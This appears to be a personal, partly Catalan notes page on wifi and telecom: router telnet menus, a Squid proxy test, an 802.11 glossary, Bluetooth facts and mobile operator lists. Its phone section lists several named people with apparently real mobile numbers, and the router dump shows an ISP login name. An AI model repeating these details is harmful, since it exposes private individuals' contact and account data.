  5. ping (DNS)
  6. ping (proxy.torrelles.guifi.net) + telnet port 3128
  7. ping (punt Omnia)
  8. ping (own, external IP)

He muntat un Smokeping, sistema que momitoritza la qualitat del enlaç. Tambe tinc un MRTG recollint dades.

MAC filter & signal strength

Nice page: comandos router Zyxel

c:\> telnet Copyright (c) 1994 - 2006 ZyXEL Communications Corp. P-660HW-D1 Main Menu Getting Started Advanced Management 1. General Setup 21. Filter Set Configuration 2. WAN Backup Setup 22. SNMP Configuration 3. LAN Setup 23. System Security (change pwd here) 4. Internet Access Setup 24. System Maintenance 25. IP Routing Policy Setup Advanced Applications 26. Schedule Setup 11. Remote Node Setup 12. Static Routing Setup 14. Dial-in User Setup 99. Exit 15. NAT Setup Menu 1 - General Setup System Name= ? Location= Contact Person's Name= Domain Name= Edit Dynamic DNS= No Route IP= Yes Bridge= No Menu 3 - LAN Setup 1. LAN Port Filter Setup 2. TCP/IP and DHCP Setup 5. Wireless LAN Setup Menu 3.2 - TCP/IP and DHCP Setup DHCP Setup DHCP= None Client IP Pool Starting Address= N/A Size of Client IP Pool= N/A Primary DNS Server= Secondary DNS Server= Remote DHCP Server= N/A TCP/IP Setup: IP Address= IP Subnet Mask= RIP Direction= Both Version= RIP-2B Multicast= IGMP-v2 IP Policies= Edit IP Alias= No Menu 3.5- Wireless LAN Setup Key Auto-generation= N/A ESSID= WLAN_GAS Hide ESSID= No Channel ID= CH09 2452MHz RTS Threshold= 2432 Frag. Threshold= 2432 WEP= N/A Default Key= N/A Key1= N/A Key2= N/A Key3= N/A Key4= N/A Edit MAC Address Filter= No Menu 3.5.1 - WLAN MAC Address Filter Active= No Filter Action= Allowed Association ------------------------------------------------------------------------------ 1= 00:10:a7:2c:42:1a 13= 00:00:00:00:00:00 25= 00:00:00:00:00:00 2= 00:00:00:00:00:00 14= 00:00:00:00:00:00 26= 00:00:00:00:00:00 3= 00:00:00:00:00:00 15= 00:00:00:00:00:00 27= 00:00:00:00:00:00 4= 00:00:00:00:00:00 16= 00:00:00:00:00:00 28= 00:00:00:00:00:00 5= 00:00:00:00:00:00 17= 00:00:00:00:00:00 29= 00:00:00:00:00:00 6= 00:00:00:00:00:00 18= 00:00:00:00:00:00 30= 00:00:00:00:00:00 7= 00:00:00:00:00:00 19= 00:00:00:00:00:00 31= 00:00:00:00:00:00 8= 00:00:00:00:00:00 20= 00:00:00:00:00:00 32= 00:00:00:00:00:00 9= 00:00:00:00:00:00 21= 00:00:00:00:00:00 10= 00:00:00:00:00:00 22= 00:00:00:00:00:00 11= 00:00:00:00:00:00 23= 00:00:00:00:00:00 12= 00:00:00:00:00:00 24= 00:00:00:00:00:00 ------------------------------------------------------------------------------ Enter here to CONFIRM or ESC to CANCEL: Press Space Bar to Toggle. Menu 4 - Internet Access Setup ISP's Name= MyISP Encapsulation= PPPoE Multiplexing= LLC-based VPI #= 8 VCI #= 32 ATM QoS Type= UBR Peak Cell Rate (PCR)= 0 Sustain Cell Rate (SCR)= 0 Maximum Burst Size (MBS)= 0 My Login= adslppp@telefonicanetpa My Password= ******** Idle Timeout (sec)= 0 IP Address Assignment= Dynamic IP Address= N/A Network Address Translation= SUA Only Address Mapping Set= N/A Menu 23.4 - System Security - IEEE802.1x Wireless Port Control= Authentication Required ReAuthentication Timer (in second)= 1800 Idle Timeout (in second)= 3600 Key Management Protocol= WPA-PSK Dynamic WEP Key Exchange= N/A PSK= ******** WPA Mixed Mode= N/A WPA Broadcast/Multicast Key Update Timer= 1800 Authentication Databases= N/A Enter Menu Selection Number: 8 (after "24") Copyright (c) 1994 - 2006 ZyXEL Communications Corp. ras> dir Valid commands are: sys exit ether wan wlan ip ppp bridge bm lan radius 8021x ras> ras> wlan load ; cargar la configuración inalámbrica en el buffer para modificar ras> wlan power 1 ; [1:19dbm / 2:18 dbm / 3:16 dbm / 4:15 dbm / 5:14 dbm] ras> wlan save ; guarda los cambios realizados wlan: save ok ras> ras> wlan clear ; borra la configuración inalámbrica ras> wlan reset ; reinicia la WLAN ras> wlan active 1 ; enciende la red WIFI ras> wlan active 0 ; apaga la red WIFI
OpSys 4 NS5

Openwrt 10.03 Backfire - lliure i altament personalitzable. Es fa servir per xarxa mesh (bàsicament una xarxa que funciona en mode ad-hoc i un protocol d'enrutament específic)


Squid proxy


c:\> telnet proxy.torrelles.guifi.net 3128 HTTP/1.0 400 Bad Request Server: squid/2.7.STABLE6 Date: Tue, 23 Aug 2011 20:31:06 GMT Content-Type: text/html Content-Length: 1316 X-Squid-Error: ERR_INVALID_REQ 0 X-Cache: MISS from torrelles.guifi.net X-Cache-Lookup: NONE from torrelles.guifi.net:3128 Via: 1.0 torrelles.guifi.net:3128 (squid/2.7.STABLE6) Connection: close <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html><head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8"> <title>ERROR: The requested URL could not be retrieved</title> <style type="text/css"> <!-- %l body :lang(fa) { direction: rtl; font-size: 100%; font-family: Tahoma, Roya, sans-serif; float: right; } :lang(he) { direction: rtl; float: right; } --> </style> </head> <body> <div id="titles"> <h1>ERROR</h1> <h2>The requested URL could not be retrieved</h2> </div> <hr> <div id="content"> <p><b>Invalid Request</b> error was encountered while trying to process the request:</p> <blockquote id="data"> <pre>jaja </pre> </blockquote> <p>Some possible problems are:</p> <ul> <li><p>Missing orunknown request method.</p></li> <li><p>Missing URL.</p></li> <li><p>Missing HTTP Identifier (HTTP/1.0).</p></li> <li><p>Request is too large.</p></li> <li><p>Content-Length missing for POST or PUT requests.</p></li> <li><p>Illegal character in hostname; underscores are not allowed.</p></li> </ul> <p>Your cache administrator is <a href="mailto:webmaster%W">webmaster</a>.</p> <br> </div> <hr> <div id="footer"> <p>Generated Tue, 23 Aug 2011 20:31:06 GMT by torrelles.guifi.net (squid/2.7.STABLE6)</p> <!-- ERR_INVALID_REQ --> </div> </body> </html> Se ha perdido la conexión con el host.
Super node

Appendix: 802.11b demystified

BSS = Basic Service Set
A cell of stations which may or may not have an access point. A "coordination function" acts as collision detection.

IBSS = Independent Basic Service Set
A self-contained BSS with no access point, one of the members can assume the "coordination function". This is the 802.11 peer-to-peer mode of operation also known as Ad-Hoc mode. Only one wireless "cell" is supported for each different SSID. All communication is done from Client to Client without the use of an Access Point. Clients use the same SSID for establishing the wireless connection.

SSID = Service Set Identifier
A 32 octet-long network name; exactly one per ESS or IBSS.

Infrastructure mode = Managed mode
This mode of operation requires the presence of an 802.11 Access Point. All communication is done via the Access Point which relays packets to other wireless Clients in the BSS as well as to nodes on a wired network such as Ethernet.

ESS = Extended Service Set
A set of one or more interconnected BSSes. All traffic flows through an access point.

6 octet cell identifier for a BSS. Value is the same as access point MAC address. Used in iwconfig for the cell value.

Origin URL  

WiFi vs BlueTooth

Amunt! Top Amunt!

wifi specs

2.462.000 KHz = 2.462 MHz = 2,462 GHz


bluetooth specs

A Bluetooth device playing the role of the "master" can communicate with up to 7 devices playing the role of the "slave". This network of "group of up to 8 devices" (1 master + 7 slaves) is called a piconet.
Every device has a unique 48-bit address Every device also has a 24-bit class identifier.

Air interface

The protocol operates in the license-free ISM band at 2.45 GHz. In order to avoid interfering with other protocols which use the 2.45 GHz band, the Bluetooth protocol divides the band into 79 channels (each 1 MHz wide) and changes channels up to 1600 times per second. Implementations with versions 1.1 and 1.2 reach speeds of 723.1 kbit/s. Version 2.0 implementations feature Bluetooth Enhanced Data Rate (EDR) , and thus reach 2.1 Mbit/s.
Technically version 2.0 devices have a higher power consumption, but the three times faster rate reduces the transmission times, effectively reducing consumption to half that of 1.x devices (assuming equal traffic load).


Bluetooth differs from Wi-Fi

The latter provides higher throughput and covers greater distances but requires more expensive hardware and higher power consumption. They use the same frequency range, but employ different multiplexing schemes. While Bluetooth is a cable replacement for a variety of applications, Wi-Fi is a cable replacement only for local area network access.

A glib summary is that Bluetooth is wireless USB (although Wireless USB is really wireless USB), whereas Wi-Fi is wireless Ethernet, both operating at much lower bandwidth than the cable systems they are trying to replace.

How stuff works :
One of the ways Bluetooth devices avoid interfering with other systems is by sending out very weak signals of about 1 milliwatt ...
Bluetooth can connect up to eight devices simultaneously ...
Bluetooth uses a technique called spread-spectrum frequency hopping that makes it rare for more than one device to be transmitting on the same frequency at the same time. In this technique, a device will use 79 individual, randomly chosen frequencies within a designated range, changing from one to another on a regular basis. In the case of Bluetooth, the transmitters change frequencies 1,600 times every second, meaning that more devices can make full use of a limited slice of the radio spectrum. Since every Bluetooth transmitter uses spread-spectrum transmitting automatically, it's unlikely that two transmitters will be on the same frequency at the same time. This same technique minimizes the risk that portable phones or baby monitors will disrupt Bluetooth devices, since any interference on a particular frequency will last only a tiny fraction of a second.
When Bluetooth-capable devices come within range of one another, an electronic conversation takes place to determine whether they have data to share or whether one needs to control the other. The user doesn't have to press a button or give a command -- the electronic conversation happens automatically. Once the conversation has occurred, the devices -- whether they're part of a computer system or a stereo -- form a network. Bluetooth systems create a personal-area network (PAN), or piconet, that may fill a room or may encompass no more distance than that between the cell phone on a belt-clip and the headset on your head. Once a piconet is established, the members randomly hop frequencies in unison so they stay in touch with one another and avoid other piconets that may be operating in the same room.



Amunt! Top Amunt!
  • Estandards
    • GSM
      Com va ? El canvi de frequencies en canviar de cel.lula ? El Roaming ?
      Teleco info, good intro.
      Com es fa una recàrrega ?
      • as CORTIX : arriba un missatge !
      • as usual : buy a card and enter the (large) code. Is anything sent before "saldo" is updated ?

      Com puc consultar el meu saldo per Internet ?

    • GPRS [General Packet Radio Service]

    • UMTS [Universal Mobile Telecommunications System]  
      Telefonia móvil de tercera generación.
      • España
        • Telefónica
        • Vodafone
        • Amena Auna - Oct 2004
        • Xfera
      • Francia
        • Orange (France Telecom)
        • SFR (Vivendi)
      • Alemania
        • T-Mobile (Deutsche Telekom)
        • Vodafone
        • Mobil COm (France Telecom)
        • 3G (Telefonica/Sonera)
        • E-Plus (KPN)
      • Italia
        • Telecom Italia Mobile
        • Omnitel (Vodafone)
        • Wind (France Telecom)
        • Telefonica PSE
        • Andala
      • Reino Unido
        • Vodafone [CDM ???]
        • TIW
        • Orange
        • British Telecom
        • Onezone
    • HDSPA (Feb 2006)

  • USA (millones de clientes)
    • Verizon Wireless : 36
    • Cingular : 23,4 [GSM] (1) unides el 18/Feb/2004
    • AT&T wireless : 21,9 [GSM] (1)
    • Sprint : 15,5
    • Nextel : 12,3
    • T-mobile : 12,1

  • Operadors mundials [9/3/2004]
    1. China Mobile
    2. Vodaphone
    3. China Unicom
    4. TEM + BSLA : 62,5 millons
    5. T-Mobile
    6. Orange
    7. NTT DoComo
    8. Cingular + AT&T Wireless

  • alliberació

  • IMEI : Enter *#06# on your phone's key pad and the 15 digit number will be displayed on the screen.

  • Com es fa : vaig al CORTIX, em cobren uns diners, envien un SMS dient que tinc mes saldo. El saldo es a la tarjeta o a la central ?

  • Com es passa l'agenda del mobil al PC i al inrevés ?
    CF62 - easy : use Siemens Data Suite [18,7 MB]
    Cable :
    • conexion to COM port : DCA-500
    • conexion to USB port : DCA-510

    f:\miscosas\CF62 !


  • Ionna : 666.36.38.42 - Siemens C45.

  • Nico : 670.85.84.98 - Siemens C45.

    2-on : 66666.38.59 - Siemens SL-55

  • Arcadi : - Nokia 5140

  • CF62 - Siemens : 667.33.88.59

  • V3 - Motorola : 677.65.86.99



Configuring an Access Point as a wireless repeater

Read Link Sys


Differences :

See BT4 and wiki.

Seguretat & WiFi & jerga
Wireless security type : Use 802.1x EAP Cisco (LEAP) + data encryption = TKIP.

802.1x, EAP.


Points at tools

List of best wireless tools.


 Amunt! Top Amunt!
Wifi links

Ep ! Site under construction. Escriu-me !
Updated 20151102 (a)  
Uf !